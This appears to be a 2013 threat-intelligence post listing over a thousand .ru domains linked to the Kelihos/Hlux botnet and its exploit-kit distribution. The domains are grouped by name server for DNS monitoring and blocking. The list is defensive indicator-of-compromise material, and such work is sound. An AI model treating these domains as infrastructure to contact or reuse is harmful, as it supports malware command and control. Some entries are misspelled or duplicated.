Known domains associated with Kelihos/Hlux distribution and command&control servers (Feb. 2013-2012)

Hundreds of domains pointing to these name servers are listed below as one list. If you see ".com" in the list, this is a name sever and is where the next batch of domains begins. You should see batches for these name servers (1500+) that are associated with Redkit, Blackhole and other exploit kits mostly delivering Kelihos/Hlux and sometimes Virut, that has been associated with this botnet as well (Jan. 2013 - Waledac Gets Cozy with Virut - Symantec). Some domains were moved to new name servers as the old ones were suspended. (for example, many domains were moved from ns[1-6].systeat.com to ns[1-6].turbusy.com.

Compare it to the usage of eu domains from the last year here http://www.abuse.ch/?p=3658.

RU domains

ns[1-6].boomsco.com - domains registered on 2013-01-13 << most active now
ns[1-6].larstor.com - domains registered on 2012-12-22 << most active now
ns[1-6].berchae.com (suspended) - domains registered on 2012-12-21
ns[1-6].zempakiv.ru - domains registered on 2012.12.07 << most active now
ns[1-6].newrect.com - domains registered on 2012-08-01
ns[1-6].turbusy.com - domains registered on 2012-12-07
ns[1-6].chokode.com (suspended) - domains registered on 2012-09-06
ns[1-6].biocruc.com (suspended) - domains registered on 2012-07-15
ns[1-6].systeat.com (suspended) - domains registered on 2012-07-07
ns[1-6].affour.com (suspended) - domains registered on 2012-06-29
ns[1-6].reetsp.com (suspended) - domains registered on 2012-06-29
ns[1-6].oparle.com - domains registered on 2012-06-05
ns[1-6].toastop.com (suspended) - domains registered on 2012-05-27
ns[1-6].ocorti.com (suspended) - domains registered on 2012-04-21
ns[1-6].esanty.com (suspended) - domains registered on 2012-04-09
ns[1-6].diastr.com (suspended) - domains registered on 2012-04-09
ns[1-6].snapoli.com (suspended) - domains registered on 2012-04-02
ns[1-6].maguiso.com (suspended) - domains registered on 2012-03-05
ns[1-6].swartra.com - domains registered on 2011-10-12

EU domains

ns[1-6].frostli.com (suspended) - domains registered on 2012-04-21
ns[1-6].pizzebu.com (suspended) - domains registered on 2012-01-13

IN domains

ns[1-6].firstara.com - domains registered on 2012-3-8

CE.MS domains (used before 2012)

ns[1-6].roblect.com - domains registered on 2011-12-01
ns[1-6].galloma.com - domains registered on 2011-10-31

Domain list
All known domains sorted by the name server and age (newest on top - see the name server registration dates on top) If you see any machines connecting to any of these domains, it is likely be infected. Listed by nameservers and NS create date. There is some duplicates in the list as same domain could move from one NS to another.

Download:
http://files.deependresearch.org/logs/activeNS-kelihos-feb2013.txt - txt file with 430+ domains using currently active name servers = > for active defense
boomsco.com
larstor.com
zempakiv.ru
newrect.com
turbusy.com

http://files.deependresearch.org/logs/all-known-domains-kelihos-2012-2013.txt - txt file with all 1550+ known to us Kelihos domains including suspended and sinkholed (2013-2011). Sorted by age (newest-oldest) = for DNS monitoring and research.

There are 1550+ unique domains.

ns[1-6].boomsco.com
aggeymin.ru
amxylkap.ru
aqqajofi.ru
asyknika.ru
bojsedyt.ru
cevlyxaq.ru
copapjid.ru
cujemjev.ru
dikojnah.ru
dobikuwe.ru
dubfoluc.ru
dyrzaqfu.ru
dyxketam.ru
egygumlo.ru
fachejyp.ru
favickov.ru
fycedqek.ru
fytfotlo.ru
giffunri.ru
gishabet.ru
guqyvzap.ru
gybebeho.ru
gyvolnac.ru
icepijog.ru
iszivkyc.ru
jiyknuqi.ru
linyaqor.ru
lisybsij.ru
lyfqekow.ru
nebgisyk.ru
ojvectyk.ru
olsicwiq.ru
owideker.ru
pahfyhfi.ru
papcybop.ru
pecunvom.ru
pegarpem.ru
pipuwbap.ru
pusycqyz.ru
qatuhnaf.ru
qiqwoxki.ru
qysmahku.ru
rulwusyc.ru
sedfibyr.ru
solhusny.ru
sudiydyx.ru
syrjikhe.ru
tegeqfux.ru
tepmahiq.ru
tijenric.ru
todqenym.ru
tubtihiv.ru
uvvycceh.ru
vacrajak.ru
viackipa.ru
vubupbeb.ru
vybakcov.ru
vyfnozed.ru
vygwomak.ru
wevwubhy.ru
woldanov.ru
xifaknow.ru
xitydjeg.ru
xizzawvu.ru
xyjiekfe.ru
yjaqexha.ru
ykmeffyw.ru
ylgoaxle.ru
yvxaghod.ru
zakiixwe.ru
zehyqjol.ru
zyfwomep.ru
zyqutfeb.ru
zyrapfev.ru

ns[1-6].larstor.com
acdastas.ru
afdotrin.ru
akmaxook.ru
akpuxqaz.ru
anhofciv.ru
apnifosa.ru
awetefid.ru
batycfac.ru
bowbiluk.ru
bugfivin.ru
cagremub.ru
cimhuspi.ru
didcufun.ru
diqnawug.ru
diteqciq.ru
dofihhog.ru
dokelzel.ru
dufyhive.ru
ecrihgep.ru
ejzazsax.ru
ektizzab.ru
eldacbet.ru
epejanhi.ru
ewenhugi.ru
fedvojvy.ru
fetolbus.ru
gehxehib.ru
goktypxi.ru
guphumsa.ru
hulirkox.ru
ixehmona.ru
jasfagal.ru
jiwviqpa.ru
jizevcyr.ru
jizugqux.ru
joljihuk.ru
jonkisig.ru
junedles.ru
kevzimom.ru
kicsodho.ru
laqursoh.ru
lejbomor.ru
lilkepiv.ru
liwuwquh.ru
lofibvar.ru
lymurufa.ru
merwiqca.ru
nopepkaq.ru
nosgazim.ru
nozwyhvi.ru
nylzudwo.ru
ocbiccan.ru
odmurwal.ru
ophirjih.ru
otfasdac.ru
pikkokih.ru
pinvahub.ru
pofhufso.ru
pomywwaq.ru
pypwalve.ru
qyxoxuzo.ru
rabpabyr.ru
racapsyq.ru
raguhloc.ru
rujascur.ru
soduvnec.ru
sumjecyg.ru
tuguijab.ru
tyjkexax.ru
ugnyspyr.ru
uhpygxav.ru
uqoquchy.ru
vibewpav.ru
vopiifdu.ru
vortatar.ru
vyzyxqyg.ru
wowrizep.ru
wufjajcy.ru
xivobwyb.ru
yficebnu.ru
ynpucwif.ru
ypvudhek.ru
zazzeqan.ru
zedwyzuc.ru
zegkyfga.ru
zunvexuq.ru

ns2.oilined.com
abofaxtu.ru
afxeftof.ru
ajgijuap.ru
atkoskih.ru
atxembef.ru
avmakpyt.ru
axcakqif.ru
azvaebyn.ru
bakuzbuq.ru
bangurec.ru
behbusqu.ru
cesivpil.ru
citpoloj.ru
cucaklif.ru
cundimam.ru
dohjapju.ru
enhawcus.ru
etujaqhe.ru
faplejir.ru
fawsilom.ru
fidqyzar.ru
fiwbyjhu.ru
focpidas.ru
fyzsicat.ru
gijcodox.ru
girwysca.ru
gywquroz.ru
hevlehaw.ru
hezyddij.ru
hikutcur.ru
ibjiocuw.ru
ihdidcyd.ru
ikbyznod.ru
irtoexki.ru
isbegisy.ru
iwhuwugy.ru
iwnemfam.ru
ixfocgaf.ru
jilvoqsi.ru
jiragsug.ru
jureetse.ru
juuqbuah.ru
kixqusos.ru
kugfulyw.ru
lafdamow.ru
lecjefys.ru
linsubby.ru
liwmiccu.ru
mywbywur.ru
narzoquc.ru
norfikuf.ru
nowqubxi.ru
nudsawyj.ru
nuzejviz.ru
nypmivhy.ru
nyzvelew.ru
ogedlayc.ru
oqivynle.ru
owtaprel.ru
pegkowoz.ru
powosjec.ru
qamelzyc.ru
qufexkig.ru
qyqkedpy.ru
qysriloh.ru
rehvuwib.ru
rosacomi.ru
ryqpynar.ru
secegbiw.ru
sepsiqbo.ru
sybqipfe.ru
syxozwag.ru
taosiram.ru
tiglatep.ru
toszegky.ru
towmidar.ru
tozlisdi.ru
tunzovnu.ru
tyryfpix.ru
ucxegxox.ru
urvohnux.ru
vagavheh.ru
vehyfgor.ru
wascadux.ru
waxpehby.ru
worgukiw.ru
xoztyhto.ru
ydfivmim.ru
yjjipdyl.ru
yksigxes.ru
ykyczeis.ru
zempakiv.ru
zifrazah.ru
zitifhuz.ru
zurgovod.ru
zuzikkeg.ru

ns[1-6].newrect.com
avenqyz.ru
axbuzyg.ru
azkenyb.ru
azkygaj.ru
baefrih.ru
bicjeko.ru
buhfyta.ru
bumwiyc.ru
bypimih.ru
byxkauv.ru
ceguheq.ru
copyseq.ru
deqbyyq.ru
ebtanij.ru
ekabdyz.ru
ekafken.ru
emjokar.ru
epsaboq.ru
eqtiwuf.ru
evleseh.ru
evutdoz.ru
ewtaniq.ru
focegob.ru
folkaax.ru
fubojla.ru
fuvijsa.ru
fynydre.ru
fyvavcu.ru
goxizap.ru
harwauz.ru
haxuryg.ru
himytyp.ru
hucimaf.ru
huwxiyl.ru
iloblod.ru
ilulxak.ru
innefwo.ru
irroxux.ru
jakybus.ru
jerjigo.ru
jifecad.ru
jokbuoj.ru
jyluxel.ru
kidazpa.ru
kovawap.ru
kykufep.ru
latokoz.ru
lirowyg.ru
lofbiwa.ru
lohucif.ru
lujmyvo.ru
majiqec.ru
mochusi.ru
neiscig.ru
nixuxor.ru
nodyfux.ru
nonogci.ru
nycaqsy.ru
nyygtic.ru
obymhij.ru
odgazoz.ru
ogazbyj.ru
ogpexol.ru
ohdujne.ru
ollobun.ru
onixdud.ru
orxykud.ru
otrasan.ru
owpejip.ru
pyjivga.ru
qadazor.ru
qadyqow.ru
qaokdyj.ru
qaromyz.ru
qewkima.ru
qovizki.ru
rijygur.ru
rovikvy.ru
ruqyxed.ru
ryygwoh.ru
sejyfat.ru
semgijo.ru
tenuluc.ru
tivizty.ru
towilax.ru
tuqjyze.ru
ugcyneg.ru
unwylhi.ru
unxajen.ru
urekkyf.ru
uvehpan.ru
vaqnula.ru
vepyhga.ru
viqsieb.ru
voqukyh.ru
wekveom.ru
wenybwu.ru
weozgyv.ru
wokseja.ru
wufkedy.ru
wumyhma.ru
wylyhan.ru
xeatsif.ru
xiguzow.ru
xowkocy.ru
xurywdo.ru
xyqysaf.ru
ydhomum.ru
ydywzik.ru
zegykso.ru
zofabby.ru
zuattiw.ru
zyglooj.ru
zytidel.ru
abofaxtu.ru
afxeftof.ru
ahtiagge.ru
ajgijuap.ru
atkoskih.ru
atxembef.ru
avmakpyt.ru
axcakqif.ru
azvaebyn.ru
bakuzbuq.ru
bangurec.ru
behbusqu.ru
cesivpil.ru
citpoloj.ru
cucaklif.ru
cundimam.ru
dohjapju.ru
enhawcus.ru
etujaqhe.ru
faplejir.ru
fawsilom.ru
fidqyzar.ru
fiwbyjhu.ru
focpidas.ru
fyzsicat.ru
gasosvaz.ru
gegwikaf.ru
gijcodox.ru
girwysca.ru
gywquroz.ru
hevlehaw.ru
hezyddij.ru
hikutcur.ru
ibjiocuw.ru
ihdidcyd.ru
ikbyznod.ru
irtoexki.ru
isbegisy.ru
iwhuwugy.ru
iwnemfam.ru
ixfocgaf.ru
jilvoqsi.ru
jiragsug.ru
jureetse.ru
juuqbuah.ru
kixqusos.ru
kugfulyw.ru
lafdamow.ru
lecjefys.ru
linsubby.ru
liwmiccu.ru
mywbywur.ru
narzoquc.ru
norfikuf.ru
nowqubxi.ru
nudsawyj.ru
nuzejviz.ru
nypmivhy.ru
nyzvelew.ru
ogedlayc.ru
oqivynle.ru
owtaprel.ru
pegkowoz.ru
powosjec.ru
qamelzyc.ru
qufexkig.ru
qyqkedpy.ru
qysriloh.ru
rehvuwib.ru
rosacomi.ru
ryqpynar.ru
secegbiw.ru
sepsiqbo.ru
sybqipfe.ru
syxozwag.ru
taosiram.ru
tiglatep.ru
toszegky.ru
towmidar.ru
tozlisdi.ru
tunzovnu.ru
tyryfpix.ru
ucxegxox.ru
urvohnux.ru
vagavheh.ru
vehyfgor.ru
voxyqjyc.ru
wascadux.ru
waxpehby.ru
worgukiw.ru
xoztyhto.ru
ydfivmim.ru
yjjipdyl.ru
yksigxes.ru
ykyczeis.ru
zifrazah.ru
zitifhuz.ru
zurgovod.ru
zuzikkeg.ru

ns[1-6].turbusy.com
aletazgi.ru
aqzepylu.ru
batpicur.ru
byjlegta.ru
cybbijyl.ru
cylqiduh.ru
deafesqy.ru
egsuista.ru
facujfet.ru
fevnotow.ru
fidedhah.ru
gamselni.ru
gegzyvet.ru
gywilhof.ru
hahsekju.ru
heztymut.ru
huquqxov.ru
ivkikcop.ru
jamwazer.ru
judxagaf.ru
jymeegom.ru
leqgugom.ru
lupylzum.ru
mosjinme.ru
neluzjiv.ru
niliqrix.ru
nobzekyx.ru
ocgaextu.ru
ojpaxlam.ru
oqlapjim.ru
otxolpow.ru
pegyrgun.ru
pevhyvys.ru
pogwytfy.ru
pynxomoj.ru
qutgagnu.ru
ruxymqic.ru
sesuhror.ru
sittanyg.ru
sivzoror.ru
siwebheb.ru
tahfifak.ru
tecviqir.ru
tiwciwux.ru
udemirus.ru
ugsovraw.ru
uwfekfyj.ru
votqygiq.ru
wetifjam.ru
wibveces.ru
wofgyqyv.ru
xeznosfu.ru
xifdupyc.ru
xikmonej.ru
xylyvkan.ru
ycjukgup.ru
ynjaprur.ru
ystinqoc.ru
zuqijcel.ru

ns[1-6].chokode.com
aldiplil.ru
apzafqyj.ru
arhutsyb.ru
bawodnes.ru
bepmetic.ru
biskehud.ru
bovtesma.ru
budymnyn.ru
bykicnof.ru
bymritun.ru
cavterjy.ru
cemyyzwe.ru
cihdiryh.ru
cilcenok.ru
ciriljug.ru
colzoqko.ru
copybvow.ru
cuchuqis.ru
cyldoqic.ru
cyxgekle.ru
datsonyl.ru
dawkavka.ru
dibpohog.ru
diumjacu.ru
dotbikeg.ru
ekmydpap.ru
espisceq.ru
etpazxej.ru
exdeflyl.ru
faddixdy.ru
fenqykqy.ru
fettucod.ru
feztaxov.ru
fivfyjmy.ru
gezahcyg.ru
giqudfip.ru
gozzujuc.ru
gyhimkyv.ru
gyzigcyd.ru
hahbikri.ru
hedeqcec.ru
himxyjaj.ru
hoqoxnof.ru
ibpintor.ru
idxoceac.ru
ilsyzfiq.ru
imvypvyz.ru
inboimdi.ru
iwnulvak.ru
jaqvicmy.ru
jozaqpol.ru
karzomug.ru
keturduq.ru
kuedzioc.ru
kumalzoh.ru
kutuqwyc.ru
laqypxez.ru
lavydfen.ru
luhhinwa.ru
maduvhap.ru
mefizner.ru
meglexis.ru
modofpaw.ru
mushycle.ru
mywyflaq.ru
myzyswot.ru
nihagmyv.ru
nihfedki.ru
nivcegik.ru
nobunzal.ru
nogdupty.ru
nohdekyk.ru
nudysmih.ru
nujqamdi.ru
obpippih.ru
odolnaer.ru
olwagmuf.ru
ompassik.ru
oqcilvis.ru
oxbogzus.ru
ozpyrgax.ru
peftuqij.ru
peletbog.ru
pijilvad.ru
pohzebib.ru
puvlyjap.ru
pyvizgaf.ru
qaqipwel.ru
qesaqead.ru
qetivqep.ru
qosxatys.ru
quisoqug.ru
quqkajiv.ru
qytzysyd.ru
rapefzab.ru
rocxokex.ru
romazlon.ru
rufmazruru
rydmuqho.ru
samuzryv.ru
sawvuctu.ru
seslopyn.ru
suhaqtak.ru
sumsonwy.ru
syjinram.ru
sytpigyq.ru
tamyhqok.ru
tesoeqwu.ru
tezujrad.ru
tymurlud.ru
ucajbiud.ru
uhjuftah.ru
uhpadcor.ru
upjyjqux.ru
uqboluqy.ru
uqnymtyq.ru
uxtadson.ru
uxtiwtis.ru
vakcudaq.ru
vargigsi.ru
varobgag.ru
vaxalbax.ru
vecvycte.ru
vedriwmi.ru
vesnobuz.ru
vibawtan.ru
vizxaxel.ru
vomzemyq.ru
vuzjoswy.ru
wazidzaf.ru
wexhunpu.ru
wiqenmoj.ru
wixelnab.ru
wobapbyg.ru
wupromxu.ru
wydybpuv.ru
xemtyroz.ru
ximxupih.ru
xiqpexsy.ru
xityxgem.ru
xudyhbes.ru
xycsapef.ru
ydruofik.ru
ykpaoxyp.ru
yphiquof.ru
yscaduif.ru
ytnainqy.ru
yvmygdus.ru
yzhepqyz.ru
zacakpym.ru
zaguqcux.ru
zamponyt.ru
zehredic.ru
zincikur.ru
zocdisge.ru
zogjolga.ru
zubbivpo.ru
zudxohok.ru
zywjixuw.ru
abaxhad.ru
adnedat.ru
adtesok.ru
asmukuf.ru
awewsip.ru
bipulte.ru
biwuvba.ru
bopwyeb.ru
bowbaiv.ru
byvbymy.ru
caqxaro.ru
citsibe.ru
dalwoza.ru
darabub.ru
dinymak.ru
doxilik.ru
egnisje.ru
estesgo.ru
evdyvaz.ru
fetucxo.ru
fixavpu.ru
gazuzoz.ru
gedopan.ru
gubahvi.ru
haponeg.ru
hedybih.ru
hitakat.ru
ihmytog.ru
ikevzaq.ru
imgohut.ru
ipdehas.ru
irhegre.ru
ivnuvuk.ru
iwvahin.ru
izxirfy.ru
jaibzup.ru
jedytlu.ru
jodkymy.ru
jokenqi.ru
jykyvca.ru
jytorqu.ru
kejejib.ru
kycufvy.ru
lopoqyv.ru
luditla.ru
mabuhos.ru
muhipew.ru
muwosiv.ru
nybzywy.ru
oqjogxi.ru
osmuryf.ru
otpipug.ru
pagubev.ru
pawahav.ru
pyykxug.ru
qiquzcy.ru
quohdit.ru
rekvyfo.ru
rifirac.ru
risytfa.ru
ritrios.ru
rujfeag.ru
rybuhoq.ru
rykafeh.ru
saxyjuw.ru
sihemuj.ru
sohaxim.ru
soqvaqo.ru
sutimjy.ru
taixcih.ru
tikoqox.ru
tozfyma.ru
turiwil.ru
ucelgos.ru
udxowub.ru
udzycaf.ru
uggifym.ru
uhduxic.ru
uhzubvo.ru
umpefan.ru
uqlahaf.ru
uxfokur.ru
uxosgik.ru
veuwhyz.ru
vunjuet.ru
vuohsub.ru
wefecfo.ru
wyjenqo.ru
xenacoz.ru
xofsimi.ru
xogitaj.ru
xomoqol.ru
ybsahov.ru
ydabxag.ru
ykocnar.ru
ynkicyr.ru
yxyqwiz.ru
yzsabuq.ru
zidamuk.ru
zylhomu.ru

ns[1-6].biocruc.com
abaxhad.ru
adnedat.ru
adtesok.ru
asmukuf.ru
awewsip.ru
bipulte.ru
biwuvba.ru
bopwyeb.ru
bowbaiv.ru
byvbymy.ru
caqxaro.ru
citsibe.ru
dalwoza.ru
darabub.ru
dinymak.ru
doxilik.ru
egnisje.ru
estesgo.ru
evdyvaz.ru
fetucxo.ru
fixavpu.ru
gazuzoz.ru
gedopan.ru
gubahvi.ru
haponeg.ru
hedybih.ru
hitakat.ru
ihmytog.ru
ikevzaq.ru
imgohut.ru
ipdehas.ru
irhegre.ru
ivnuvuk.ru
iwvahin.ru
izxirfy.ru
jaibzup.ru
jedytlu.ru
jodkymy.ru
jokenqi.ru
jykyvca.ru
jytorqu.ru
kejejib.ru
kycufvy.ru
lopoqyv.ru
luditla.ru
mabuhos.ru
muhipew.ru
muwosiv.ru
nybzywy.ru
oqjogxi.ru
osmuryf.ru
otpipug.ru
pagubev.ru
pawahav.ru
pyykxug.ru
qiquzcy.ru
quohdit.ru
rekvyfo.ru
rifirac.ru
risytfa.ru
ritrios.ru
rujfeag.ru
rybuhoq.ru
rykafeh.ru
saxyjuw.ru
sihemuj.ru
sohaxim.ru
soqvaqo.ru
sutimjy.ru
taixcih.ru
tikoqox.ru
tozfyma.ru
turiwil.ru
ucelgos.ru
udxowub.ru
udzycaf.ru
uggifym.ru
uhduxic.ru
uhzubvo.ru
umpefan.ru
uqlahaf.ru
uxfokur.ru
uxosgik.ru
veuwhyz.ru
vunjuet.ru
vuohsub.ru
wefecfo.ru
wyjenqo.ru
xenacoz.ru
xofsimi.ru
xogitaj.ru
xomoqol.ru
ybsahov.ru
ydabxag.ru
ykocnar.ru
ynkicyr.ru
yxyqwiz.ru
yzsabuq.ru
zidamuk.ru
zylhomu.ru

ns[1-6].systeat.com
arvomxo.ru
cyeqsov.ru
deicqig.ru
dodexco.ru
dydajej.ru
eqsonas.ru
figbuar.ru
fyefxug.ru
hecrery.ru
huckazu.ru
hyqugry.ru
hysgofy.ru
idxogow.ru
ilmagih.ru
iwahroq.ru
kiqybur.ru
lihibir.ru
meewxib.ru
miwywky.ru
nuycmeh.ru
ofyrmaj.ru
ophopop.ru
papiteb.ru
qawumqi.ru
qobcovy.ru
qubeqxa.ru
ripebet.ru
rolyjyl.ru
tehomeb.ru
tejuxiv.ru
tisreyp.ru
ubbylys.ru
ufremku.ru
uhwipiq.ru
uslowyj.ru
vesuqpu.ru
vokpaav.ru
xakruaq.ru
yhqinyp.ru
ysufzub.ru
yvufraf.ru
zeryqiq.ru
zihemmi.ru
zoryqky.ru
zynxuih.ru
zypzieb.ru
zysaten.ru
aletazgi.ru
aqzepylu.ru
aswoxmur.ru
batpicur.ru
bepmetic.ru
biskehud.ru
biwtihop.ru
bovtesma.ru
bycmolhy.ru
bygotbys.ru
bymritun.ru
cihdiryh.ru
ciriljug.ru
colzoqko.ru
copybvow.ru
cuchuqis.ru
cybbijyl.ru
cylqiduh.ru
cyxgekle.ru
datsonyl.ru
dawkavka.ru
deafesqy.ru
dehjujuq.ru
diumjacu.ru
dohwapih.ru
exdeflyl.ru
faddixdy.ru
fenqykqy.ru
fettucod.ru
fohfynly.ru
gamselni.ru
gegzyvet.ru
ginnyjyb.ru
gozzujuc.ru
gyhimkyv.ru
gyzigcyd.ru
hahsekju.ru
hezsoxys.ru
heztymut.ru
himxyjaj.ru
huekgouz.ru
huluwhur.ru
huquqxov.ru
ibpintor.ru
ilsyzfiq.ru
inboimdi.ru
iwnulvak.ru
jaqvicmy.ru
jaweckob.ru
jebtelyx.ru
judxagaf.ru
jyggimib.ru
keturduq.ru
kozfofti.ru
kuedzioc.ru
lavydfen.ru
lufsekim.ru
luhhinwa.ru
maduvhap.ru
mefizner.ru
meglexis.ru
mushycle.ru
myzyswot.ru
naselzit.ru
nayxitgy.ru
nihagmyv.ru
nobunzal.ru
nohdekyk.ru
nudysmih.ru
odolnaer.ru
olwagmuf.ru
ompassik.ru
oqcilvis.ru
otxolpow.ru
ozpyrgax.ru
pedugtap.ru
pegyrgun.ru
peletbog.ru
pogwytfy.ru
pohzebib.ru
pynxomoj.ru
qantysag.ru
qesaqead.ru
qiimovap.ru
qosxatys.ru
quqkajiv.ru
qutgagnu.ru
qytzysyd.ru
racadpuh.ru
rebfelqi.ru
rizsebym.ru
rocxokex.ru
ruxymqic.ru
seslopyn.ru
sexjereh.ru
sivzoror.ru
suhaqtak.ru
sukbewli.ru
syjinram.ru
sytpigyq.ru
tamyhqok.ru
tesoeqwu.ru
tezujrad.ru
tiwciwux.ru
udemirus.ru
ugsovraw.ru
uhjuftah.ru
upjyjqux.ru
uwfekfyj.ru
uwfubpeb.ru
uxtadson.ru
uxtiwtis.ru
vargigsi.ru
vaxalbax.ru
vibawtan.ru
vizxaxel.ru
vomzemyq.ru
vuzjoswy.ru
wapifnuc.ru
warkafoc.ru
wibveces.ru
wixelnab.ru
wobapbyg.ru
wofgyqyv.ru
wupromxu.ru
xeznosfu.ru
xikmonej.ru
xiqpexsy.ru
xudyhbes.ru
xylyvkan.ru
ycjukgup.ru
ydruofik.ru
yphiquof.ru
yscaduif.ru
ystinqoc.ru
yvmygdus.ru
ywsyhrab.ru
yzhepqyz.ru
zacakpym.ru
zaguqcux.ru
zajkihyq.ru
zamponyt.ru
zekufyji.ru
zincikur.ru
zogjolga.ru
zubbivpo.ru
zupivzed.ru
zuqijcel.ru
zywjixuw.ru
arvomxo.ru
avondov.ru
begotav.ru
byypsof.ru
cyeqsov.ru
deicqig.ru
denapgo.ru
devehom.ru
dodexco.ru
dydajej.ru
ebmekis.ru
ebmeqbe.ru
egsopro.ru
ehmyqaq.ru
eqsonas.ru
eqywwoh.ru
essaruc.ru
ezhimim.ru
fafsuuq.ru
figbuar.ru
focvova.ru
fuxjiho.ru
fyefxug.ru
fyvegom.ru
hecrery.ru
hirqusu.ru
hookfiq.ru
huckazu.ru
huzgota.ru
hyqugry.ru
hyxejaj.ru
idxogow.ru
ilmagih.ru
imkaqro.ru
iwahroq.ru
ixomzob.ru
jabyrid.ru
jaccaad.ru
jemudiz.ru
jydybce.ru
kadseop.ru
kiqybur.ru
kobucco.ru
kufdeag.ru
kulegoh.ru
kylqaoq.ru
lihibir.ru
lucypek.ru
meewxib.ru
melimma.ru
mijijub.ru
miwywky.ru
mubidpy.ru
nebirza.ru
nicibma.ru
nutimad.ru
nuycmeh.ru
ofyrmaj.ru
onzomub.ru
ophopop.ru
oxcimun.ru
papiteb.ru
pesudwa.ru
pikihow.ru
poxatli.ru
pyhozod.ru
qawumqi.ru
qobcovy.ru
qubeqxa.ru
quhokle.ru
rahupvu.ru
rapfuwo.ru
ripebet.ru
rolyjyl.ru
rycgoka.ru
tehomeb.ru
tejuxiv.ru
tenbyvo.ru
tilecak.ru
tisreyp.ru
tonalog.ru
tumrexu.ru
ubbylys.ru
ufremku.ru
uhwipiq.ru
unperyh.ru
upwifav.ru
uslowyj.ru
uxzuhur.ru
uzofmep.ru
vayvdav.ru
vesuqpu.ru
vewehoh.ru
viicdim.ru
vokpaav.ru
vylengo.ru
walybhy.ru
wiofmez.ru
xakruaq.ru
xixikot.ru
xokukat.ru
xuxywpe.ru
yhqinyp.ru
ykqevax.ru
yqegpaz.ru
ysufzub.ru
yvufraf.ru
zeryqiq.ru
zihemmi.ru
zoryqky.ru
zyidgec.ru
zynxuih.ru
zypzieb.ru
zysaten.ru

ns[1-6].reetsp.com
adnedat.ru
adtesok.ru
asmukuf.ru
bipulte.ru
bopwyeb.ru
bowbaiv.ru
byvbymy.ru
caqxaro.ru
egnisje.ru
evdyvaz.ru
hitakat.ru
ikevzaq.ru
imgohut.ru
ipdehas.ru
izxirfy.ru
jokenqi.ru
jykyvca.ru
lopoqyv.ru
nybzywy.ru
osmuryf.ru
otpipug.ru
pagubev.ru
pawahav.ru
risytfa.ru
rybuhoq.ru
sihemuj.ru
soqvaqo.ru
sutimjy.ru
taixcih.ru
turiwil.ru
uhzubvo.ru
umpefan.ru
uxfokur.ru
vuohsub.ru
ybsahov.ru
ydabxag.ru
ykocnar.ru
yxyqwiz.ru
yzsabuq.ru
reetsp.com

ns[1-6]affour.com
arvomxo.ru
cyeqsov.ru
denapgo.ru
dodexco.ru
dydajej.ru
ebmekis.ru
ebmeqbe.ru
ehmyqaq.ru
eqsonas.ru
ezhimim.ru
figbuar.ru
fyefxug.ru
hecrery.ru
huckazu.ru
hyqugry.ru
hysgofy.ru
ilmagih.ru
imkaqro.ru
iwahroq.ru
ixomzob.ru
jabyrid.ru
kylqaoq.ru
lihibir.ru
meewxib.ru
miwywky.ru
ophopop.ru
papiteb.ru
pyhozod.ru
qawumqi.ru
qobcovy.ru
qubeqxa.ru
ripebet.ru
rolyjyl.ru
tehomeb.ru
tejuxiv.ru
tilecak.ru
tisreyp.ru
ubbylys.ru
uhwipiq.ru
unperyh.ru
uslowyj.ru
uxzuhur.ru
uzanxyk.ru
vayvdav.ru
vesuqpu.ru
viicdim.ru
vokpaav.ru
vylengo.ru
walybhy.ru
wiofmez.ru
xokukat.ru
xuxywpe.ru
yhqinyp.ru
ykqevax.ru
ysufzub.ru
yvufraf.ru
zoryqky.ru
zyidgec.ru
zynxuih.ru
zypzieb.ru
zysaten.ru
affour.com

ns[1-6].toastop.com
arvomxo.ru
avondov.ru
begotav.ru
byypsof.ru
cyeqsov.ru
deicqig.ru
denapgo.ru
devehom.ru
dodexco.ru
dydajej.ru
ebmekis.ru
ebmeqbe.ru
egsopro.ru
ehmyqaq.ru
eqsonas.ru
eqywwoh.ru
essaruc.ru
ezhimim.ru
fafsuuq.ru
figbuar.ru
focvova.ru
fuxjiho.ru
fyefxug.ru
fyvegom.ru
hecrery.ru
hirqusu.ru
hookfiq.ru
huckazu.ru
huzgota.ru
hyqugry.ru
hyxejaj.ru
idxogow.ru
ilmagih.ru
imkaqro.ru
iwahroq.ru
ixomzob.ru
jabyrid.ru
jaccaad.ru
jemudiz.ru
jydybce.ru
kadseop.ru
kiqybur.ru
kobucco.ru
kufdeag.ru
kulegoh.ru
kylqaoq.ru
lihibir.ru
lucypek.ru
meewxib.ru
melimma.ru
mijijub.ru
miwywky.ru
mubidpy.ru
nebirza.ru
nicibma.ru
nutimad.ru
nuycmeh.ru
ofyrmaj.ru
onzomub.ru
ophopop.ru
oxcimun.ru
papiteb.ru
pesudwa.ru
pikihow.ru
poxatli.ru
pyhozod.ru
qawumqi.ru
qobcovy.ru
qubeqxa.ru
quhokle.ru
rahupvu.ru
rapfuwo.ru
ripebet.ru
rolyjyl.ru
rycgoka.ru
tehomeb.ru
tejuxiv.ru
tenbyvo.ru
tilecak.ru
tisreyp.ru
tonalog.ru
tumrexu.ru
ubbylys.ru
ufremku.ru
uhwipiq.ru
unperyh.ru
upwifav.ru
uslowyj.ru
uxzuhur.ru
uzofmep.ru
vayvdav.ru
vesuqpu.ru
vewehoh.ru
viicdim.ru
vokpaav.ru
vylengo.ru
walybhy.ru
wiofmez.ru
xakruaq.ru
xixikot.ru
xokukat.ru
xuxywpe.ru
yhqinyp.ru
ykqevax.ru
yqegpaz.ru
ysufzub.ru
yvufraf.ru
zeryqiq.ru
zihemmi.ru
zoryqky.ru
zyidgec.ru
zynxuih.ru
zypzieb.ru
zysaten.ru

ns[1-6]ocorti.com
ajgufog.ru
bogquse.ru
bylviha.ru
cuekzut.ru
cyuhtut.ru
deivwyx.ru
duebgud.ru
ehakkaz.ru
exmotof.ru
ezirhaz.ru
giczeca.ru
houktuh.ru
ihfajoc.ru
jygowku.ru
jykaxfy.ru
kabezer.ru
kipokfy.ru
lojseuv.ru
nilwoim.ru
ojuxxub.ru
okrolyk.ru
onsenyq.ru
pidohis.ru
qiohxuv.ru
qoqwoas.ru
qoripwe.ru
raleqle.ru
ripexru.ru
sidinox.ru
suvmune.ru
tevythi.ru
tobjuow.ru
tyhrypo.ru
veoxzul.ru
vysatyv.ru
wegipij.ru
xuzuppu.ru
ypemval.ru
ypyxwon.ru
yqdazyb.ru
yvnahty.ru
ocorti.com

ns[1-6]esanty.com
affuxok.ru
ajgufog.ru
bogquse.ru
cuekzut.ru
cyuhtut.ru
deivwyx.ru
duebgud.ru
ehakkaz.ru
exmotof.ru
ezirhaz.ru
giczeca.ru
houktuh.ru
ihfajoc.ru
jazzute.ru
jygowku.ru
jykaxfy.ru
kabezer.ru
kipokfy.ru
nilwoim.ru
